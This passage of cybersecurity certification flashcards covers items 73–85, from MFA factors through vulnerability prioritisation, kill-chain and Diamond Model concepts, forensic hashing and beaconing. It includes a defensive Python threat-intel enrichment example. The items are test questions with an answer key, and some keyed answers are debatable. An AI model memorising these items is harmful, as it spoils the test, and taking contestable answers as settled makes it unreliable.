Multi-factor authentication (MFA) creates multiple security layers to help increase the confidence that the user requesting access is who they claim to be by requiring two distinct factors for authentication. These factors can be something you know (knowledge factor), something you have (possession factor), something you are (inherence factor), something you do (action factor), or somewhere you are (location factor). By selecting a smartcard (something you have) and a PIN (something you know), you have implemented multi-factor authentication. Choosing a fingerprint and retinal scan would instead use only one factor (inherence). Choosing a username and password, or a password and security question, would also be using only one factor (knowledge); a username is an identifier, not a secret, and a security question is just another thing you know. For something to be considered multi-factor, you need items from at least two different authentication factor categories: knowledge, possession, inherence, location, or action.

73
Q

Among the following strategies for dealing with multiple known vulnerabilities, which one is deemed MOST crucial for their successful management and mitigation?

A. The type of vulnerabilities.
B. The location of vulnerabilities.
C. The number of vulnerabilities.
D. Prioritizing the risk level associated with each vulnerability.

A

D. Prioritizing the risk level associated with each vulnerability.

Risk prioritization is an essential part of vulnerability management, focusing on the most significant threats in a cybersecurity landscape. It involves assessing potential vulnerabilities, considering their likelihood of exploitation, and the potential impact of such an event. After prioritizing vulnerabilities, the highest-risk ones are addressed first, using methods such as software patching or security policy enhancement. This process is continuously revisited and adjusted as new threats and vulnerabilities emerge. While knowing where vulnerabilities reside is important, it’s not the main factor in prioritization. The risk each vulnerability carries is more critical. The type of vulnerabilities may provide some context, but it is the risk associated with each that should primarily drive prioritization. The number alone does not give an accurate picture of prioritization. Not all vulnerabilities pose the same level of risk.

74
Q

An organization is conducting a cybersecurity training exercise. What team is Jason assigned to if he has been asked to monitor and manage the defenders’ and attackers’ technical environment during the exercise?

A. Purple team
B. Red team
C. Blue team
D. White team

A

D. White team

Jason is assigned to the white team. The white team acts as the judges, enforces the rules of the exercise, observes the exercise, scores teams, resolves any problems that may arise, handles all requests for information or questions, and ensures that the competition runs fairly and does not cause operational problems for the defender’s mission. A red team is a group of people authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s security posture. A blue team is a group of people responsible for defending an enterprise’s use of information systems by maintaining its security posture against a group of mock attackers. The purple team is made up of both the blue and red teams to work together to maximize their cyber capabilities through continuous feedback and knowledge transfer between attackers and defenders.

75
Q

You are reverse engineering a piece of malware recovered from a retailer’s network for analysis. They found that the malicious code was extracting track data from their customer’s credit cards during processing. Which of the following types of threats would you classify this malware as?

A. POS malware
B. Keylogger
C. Ransomware
D. Rootkit

A

A. POS malware

Point-of-sale (POS) malware is malicious software used by cybercriminals to target point-of-sale and payment terminals with the intent of obtaining credit and debit card information (a card's track 1 or track 2 data and sometimes even the CVV code) by intercepting the card data while the retail checkout system is processing it, a form of man-in-the-middle attack on the payment flow. Ransomware is a type of malware that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. Keyloggers are a type of monitoring software designed to record keystrokes made by a user. These keyloggers can record the information you type into a website or application and send it back to an attacker. A rootkit is a malware class that modifies system files, often at the kernel level, to conceal its presence.

76
Q

You are in the recovery steps of an incident response. Your analysis revealed that the attacker exploited an unpatched vulnerability on a public-facing web server as the initial intrusion vector in this incident. Which of the following mitigations should be implemented first during the recovery?

A. Restrict host access to peripheral protocols like USB and Bluetooth.
B. Restrict shell commands per user or per host for least privilege purposes.
C. Disable unused user account and reset the administrator credentials.
D. Scan the network for additional instances of this vulnerability and patch the affected assets.

A

D. Scan the network for additional instances of this vulnerability and patch the affected assets.

All of the options listed are the best security practices to implement before and after a detected intrusion, but scanning for additional instances of this vulnerability should be performed first. Often, an enterprise network uses the same baseline configuration for all servers and workstations. Therefore, if a vulnerability is exploited on one device (such as an insecure configuration), that same vulnerability could exist on many other assets across the network. During your recovery, you must identify if any other network systems share the same vulnerability and mitigate them. If you don’t, the attacker could quickly reinfect your network by simply attacking another machine using the same techniques used during this intrusion. The other options listed are all examples of additional device hardening that should be conducted during recovery after you have identified the exploited vulnerability across the rest of the network.

77
Q

You are in the recovery steps of an incident response. Throughout the incident, your team never successfully determined the root cause of the network compromise. Which of the following options would you LEAST likely perform as part of your recovery and remediation actions?

A. Proactively sanitize and reimage all of your routers and switches.
B. Review and enhance patch management policies.
C. Restrict host access to peripheral protocols like USB or Bluetooth.
D. Disable unused user accounts.

A

A. Proactively sanitize and reimage all of your routers and switches.

Since your team could not determine the root cause of the compromise, you would most likely conduct broad system and network hardening actions as part of the recovery and remediation. The only option that is not a hardening action is proactively sanitizing and reimaging all of your routers and switches. Without evidence that the network devices were compromised, this would be a large, disruptive, and expensive undertaking with no assurance that it addresses the actual intrusion path; reimaging devices without knowing the root cause is likely to be ineffective in securing the network. It would be more beneficial to increase monitoring of those devices so that any sign of compromise is caught. The other options (enhancing patch management, restricting peripheral protocols, and disabling unused accounts) are best practices that shrink the attack surface regardless of which vector was used.

78
Q

Your organization has noticed an increase in the number of security incidents being detected. To better understand the situation and measure the effectiveness of your incident response process, what key performance indicator (KPI) could you use?

A. Alert volume.
B. Cost of incidents.
C. Number of false positives.
D. Mean time to remediate.

A

A. Alert volume.

An increase in alert volume may correlate with an increase in detected incidents, so measuring this KPI gives insight into the frequency of potential security incidents. The number of false positives matters for analyst efficiency, but it does not directly report how many true security incidents are being detected. Mean time to remediate measures how long it takes to address a security incident, not how many incidents are being detected. Cost of incidents measures their financial impact, not their frequency or detection rate.

79
Q

In 2013, retail giant Target Corporation experienced a massive data breach, exposing the credit and debit card information of 40 million customers. Following this security incident, a special team was tasked with investigating the fundamental cause of the breach, uncovering the sequence of events that led to it, and providing insights to prevent such occurrences in the future. What term best describes this deep-dive investigative process?

A. Lessons learned
B. Root cause analysis
C. Incident response plan
D. Forensic analysis

A

B. Root cause analysis

Root cause analysis involves identifying the initial cause or the underlying factors that contributed to an incident. An incident response plan outlines procedures and processes for handling security incidents. It is a preparation tool, not a post-incident activity to identify the underlying cause of an incident. The lessons learned process involves reviewing an incident to identify what was done well and what needs improvement for future responses. It does not primarily focus on identifying the underlying cause of the incident. While forensic analysis involves a meticulous examination of all evidence related to an incident, its primary aim is not to identify the underlying cause.

80
Q

Which phase of the Cyber Kill Chain involves the gathering of information about the target system, its technologies, potential vulnerabilities, and users?

A. Reconnaissance
B. Weaponization
C. Delivery
D. Exploitation

A

A. Reconnaissance

Reconnaissance is the initial phase of the Cyber Kill Chain that involves gathering information about the target system, its technologies, potential vulnerabilities, and users. Exploitation involves the execution of the delivered exploit, not gathering information about a target system. The weaponization phase involves packaging an exploit into a deliverable payload, not gathering information about a target system. The delivery phase involves transmitting the weaponized bundle to the victim, not gathering information about a target system.

81
Q

In the Diamond Model of Intrusion Analysis, what does the Capability component represent?

A. The physical and virtual resources utilized in the attack.
B. The entity conducting the attack.
C. The entity that is targeted by the attack.
D. The tools and techniques used in the attack.

A

D. The tools and techniques used in the attack.

The Capability component of the Diamond Model of Intrusion Analysis represents the tools and techniques used in the attack. The entity conducting the attack is represented by the Adversary, not Capability. The entity that is targeted by the attack is represented by the Victim, not Capability. The physical and virtual resources utilized in the attack are represented by Infrastructure, not Capability.

82
Q

An adversary compromises a web server in your network using a zero-day exploit and then uses it as a command and control (C2) server for further attacks. Which stage of the MITRE ATT&CK framework does the use of a C2 server illustrate?

A. Command and Control
B. Persistence
C. Exploitation
D. Impact

A

A. Command and Control

In the MITRE ATT&CK framework, Command and Control is a stage that describes how an adversary communicates with systems under their control within a target network. Persistence involves methods an adversary might use to maintain access within a network, but doesn’t represent the use of a C2 server. Exploitation is part of gaining initial access but does not describe the use of compromised systems for command and control. Impact describes the objective of the adversary, often disruptive actions like data destruction or defacement. The use of a C2 server is not an impact action.

83
Q

Which of the following automatically combines multiple disparate sources of information to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting?

A. Data enrichment.
B. Deep learning.
C. Continuous integration.
D. Machine learning.

A

A. Data enrichment.

Data enrichment could, for example, combine a threat intelligence feed with NetFlow records, letting the analyst see at a glance whether an IP address of interest is associated with a known APT, and join that with the asset inventory so the internal side of the conversation has a hostname and an owner rather than just an address. Machine learning and deep learning are forms of artificial intelligence that may be used to perform data enrichment, but individually they are not sufficient to answer this question. Continuous integration is a software development method in which code updates are tested and committed to development or build servers/code repositories rapidly, and is unrelated to this question.
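The NetFlow-plus-threat-intel join described above, as an added example that is not part of the original card. The flow records, the indicator feed and the asset inventory are all constructed for the demonstration (a real pipeline would pull the feed from a threat intelligence platform and the inventory from a CMDB); the IP addresses are documentation/private ranges and the actor name is made up.

```python
from collections import defaultdict

# Constructed NetFlow-style records (not real traffic): internal src talking to external dst.
FLOWS = [
    {"ts": "2024-05-01T03:14:07Z", "src": "10.10.5.23", "dst": "198.51.100.7",  "dport": 443,  "bytes": 912000},
    {"ts": "2024-05-01T03:14:21Z", "src": "10.10.5.23", "dst": "203.0.113.50",  "dport": 8443, "bytes": 2100},
    {"ts": "2024-05-01T03:15:02Z", "src": "10.10.7.9",  "dst": "203.0.113.50",  "dport": 8443, "bytes": 1800},
    {"ts": "2024-05-01T03:16:40Z", "src": "10.10.7.9",  "dst": "93.184.216.34", "dport": 80,   "bytes": 5400},
]

# Constructed threat-intel feed keyed by indicator; the actor name is fictional.
THREAT_INTEL = {
    "203.0.113.50": {"actor": "APT-Example", "type": "c2", "confidence": 85},
}

# Constructed asset inventory keyed by internal IP.
ASSETS = {
    "10.10.5.23": {"hostname": "fin-ws-012", "owner": "finance"},
    "10.10.7.9":  {"hostname": "dev-ws-044", "owner": "engineering"},
}

def enrich_flow(flow, intel=THREAT_INTEL, assets=ASSETS):
    """Attach intel context for whichever side is a known indicator, and asset context for the internal side."""
    enriched = dict(flow)
    enriched["intel"] = intel.get(flow["dst"]) or intel.get(flow["src"])
    enriched["asset"] = assets.get(flow["src"]) or assets.get(flow["dst"])
    return enriched

def enrich_flows(flows, intel=THREAT_INTEL, assets=ASSETS):
    return [enrich_flow(f, intel, assets) for f in flows]

def flows_of_interest(enriched, min_confidence=70):
    """Keep only flows whose peer is a known indicator at or above the confidence bar."""
    return [f for f in enriched if f["intel"] and f["intel"]["confidence"] >= min_confidence]

def hosts_by_actor(enriched, min_confidence=70):
    """Pivot for the analyst: which internal hosts talked to each actor's infrastructure, and how many bytes."""
    out = defaultdict(dict)
    for f in flows_of_interest(enriched, min_confidence):
        host = f["asset"]["hostname"] if f["asset"] else f["src"]
        actor = f["intel"]["actor"]
        out[actor][host] = out[actor].get(host, 0) + f["bytes"]
    return dict(out)

if __name__ == "__main__":
    enriched = enrich_flows(FLOWS)
    for f in flows_of_interest(enriched):
        print(f["ts"], f["asset"]["hostname"], "->", f["dst"], f["intel"])
    print(hosts_by_actor(enriched))
```

Two of the four flows are small connections from two different workstations to the same indicator on an unusual port, which is the beaconing pattern an analyst hunts for; the large 443 flow to an unknown address is left alone because nothing in the feed says it is bad. The confidence threshold is the knob that keeps low-quality feed entries from paging someone at 3 a.m.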

84
Q

Which of the following actions should be done FIRST after forensically imaging a hard drive for evidence in an investigation?

A. Encrypt the source drive to ensure an attacker cannot modify its contents.
B. Encrypt the image file to ensure it maintains data integrity.
C. Create a hash digest of the source drive and the image file to ensure they match.
D. Digitally sign the image file to provide non-repudiation of the collection.

A

C. Create a hash digest of the source drive and the image file to ensure they match.

The first thing that must be done after acquiring a forensic disk image is to create a hash digest of the source drive and destination image file to ensure they match. A critical step in the presentation of evidence will be to prove that analysis has been performed on an identical image to the data present on the physical media and that neither data set has been tampered with. The standard means of proving this is to create a cryptographic hash or fingerprint of the disk contents and any derivative images made from it. When comparing hash values, you need to use the same algorithm used to create the reference value. While encrypting the image files is a good security practice to maintain the data’s confidentiality, it does not provide data integrity like a hash digest does. Once imaged, the source drive should not be altered or encrypted. Digitally signing the image file could serve the function of non-repudiation, but it is an uncommon practice and not required to be performed.

85
Q

A cybersecurity analyst has received an alert that sensors continuously observe well-known call home messages at their network boundary. Still, the organization’s proxy firewall is properly configured to successfully drop the messages before leaving the network. Which of the following is MOST likely the cause of the call home messages being sent?

A. An attacker is performing reconnaissance on the organization’s workstations.
B. A malicious insider is trying to exfiltrate information to a remote network.
C. Malware is running on a company workstation or server.
D. An infected workstation is attempting to reach a command and control server.

A

D. An infected workstation is attempting to reach a command and control server.

A call home message is an indicator of compromise known as beaconing. Beaconing usually occurs after a stage 1 malware program has been implanted on an organization’s workstation or server, but that isn’t the most correct answer to this question. Instead, beaconing indicates that a workstation or server is infected and is trying to communicate with the attacker’s command and control server. This beaconing will continue until the infected system (workstation or server) is found and cleared of the malware, or until the botnet gives the infected host further instructions to perform (such as to attack). “Malware is running on a company workstation or server” is incorrect because we do not have positive verification of that based on this scenario. A beacon does not have to be malware. For example, it can simply be a single ping packet or DNS request sent out every day at a certain time using the Windows task scheduler. Be careful on the exam to answer the question being asked and choose the “most” accurate answer. Since the call home signal is coming from the internal network and attempting to connect to an external server, it cannot be evidence of an attacker performing reconnaissance on your workstations. Also, nothing in the question is indicative of an insider threat trying to exfiltrate information, since a call home message is generally minimal in size and not large enough to exfiltrate data.